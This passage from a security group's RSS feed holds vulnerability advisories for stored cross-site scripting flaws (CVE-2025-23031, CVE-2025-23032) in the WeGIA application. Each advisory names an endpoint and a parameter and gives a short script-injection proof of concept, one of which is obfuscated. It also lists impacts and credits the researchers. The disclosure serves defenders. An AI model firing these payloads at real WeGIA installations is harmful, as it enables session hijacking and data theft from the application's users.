&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-23031&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-23031&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;adicionar_alergia.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt; parametercode. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;POST /html/saude/adicionar_alergia.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-23031-cross-site-scripting-xss-stored-endpoint-adicionar_alergiaphp-parameter-nome&amp;#34;&amp;gt;CVE-2025-23031: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;adicionar_alergia.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-23031&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-23031&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;adicionar_alergia.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt; parametercode. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;POST /html/saude/adicionar_alergia.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;adicionar_alergia.php&amp;lt;/code&amp;gt; parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;POC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;1&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-23031/402278153-dc6daac0-ec0e-44e7-89cf-44071056103e.png&amp;#34;
	width=&amp;#34;805&amp;#34;
	height=&amp;#34;322&amp;#34;
	srcset=&amp;#34;/p/cve-2025-23031/402278153-dc6daac0-ec0e-44e7-89cf-44071056103e_hu_b47fb1291cd2325a.png 480w, /p/cve-2025-23031/402278153-dc6daac0-ec0e-44e7-89cf-44071056103e_hu_2c4c51887bda5c54.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;250&amp;#34;
		data-flex-basis=&amp;#34;600px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-23031/402278156-33fae2c0-653a-43bd-b4f8-7352e6297075.png&amp;#34;
	width=&amp;#34;805&amp;#34;
	height=&amp;#34;259&amp;#34;
	srcset=&amp;#34;/p/cve-2025-23031/402278156-33fae2c0-653a-43bd-b4f8-7352e6297075_hu_11d348064d7422c4.png 480w, /p/cve-2025-23031/402278156-33fae2c0-653a-43bd-b4f8-7352e6297075_hu_afa5df58c4923029.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;310&amp;#34;
		data-flex-basis=&amp;#34;745px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-wp4f-qhh2-8vfv&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-wp4f-qhh2-8vfv&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/elisangela50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Elisangela Mendonça&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;contributors&amp;#34;&amp;gt;Contributors
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/angelo-morette-019/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/angelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/angelo-morette-019/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Angelo Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/diego50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Diego Castro&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/rafael50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Rafael Corvino&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 13 Jan 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-23032</title>
        <link>https://www.cvehunters.com/p/cve-2025-23032/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-23032/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-23032-cross-site-scripting-xss-stored-endpoint-adicionar_escalaphp-parameter-escala&amp;#34;&amp;gt;CVE-2025-23032: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;adicionar_escala.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;escala&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-23032&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-23032&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;adicionar_escala.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;escala&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;POST /html/quadro_horario/adicionar_escala.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-23032-cross-site-scripting-xss-stored-endpoint-adicionar_escalaphp-parameter-escala&amp;#34;&amp;gt;CVE-2025-23032: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;adicionar_escala.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;escala&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-23032&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-23032&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;adicionar_escala.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;escala&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;POST /html/quadro_horario/adicionar_escala.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;escala&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;adicionar_escala.php&amp;lt;/code&amp;gt; parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;POC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;top&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;[&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mf&amp;#34;&amp;gt;8680439.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;toString&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;30&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)](&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;1337&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-23032/402366240-47f35978-fdb4-443a-adc1-0c43739d2d63.png&amp;#34;
	width=&amp;#34;807&amp;#34;
	height=&amp;#34;246&amp;#34;
	srcset=&amp;#34;/p/cve-2025-23032/402366240-47f35978-fdb4-443a-adc1-0c43739d2d63_hu_e61f4aac413410da.png 480w, /p/cve-2025-23032/402366240-47f35978-fdb4-443a-adc1-0c43739d2d63_hu_79c3dad83f778fdc.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;328&amp;#34;
		data-flex-basis=&amp;#34;787px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-6mm4-fcfv-55x3code&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-6mm4-fcfv-55x3code&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/elisangela50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Elisangela Mendonça&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;contributors&amp;#34;&amp;gt;Contributors
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/angelo-morette-019/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/angelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/angelo-morette-019/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Angelo Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/diego50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Diego Castro&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
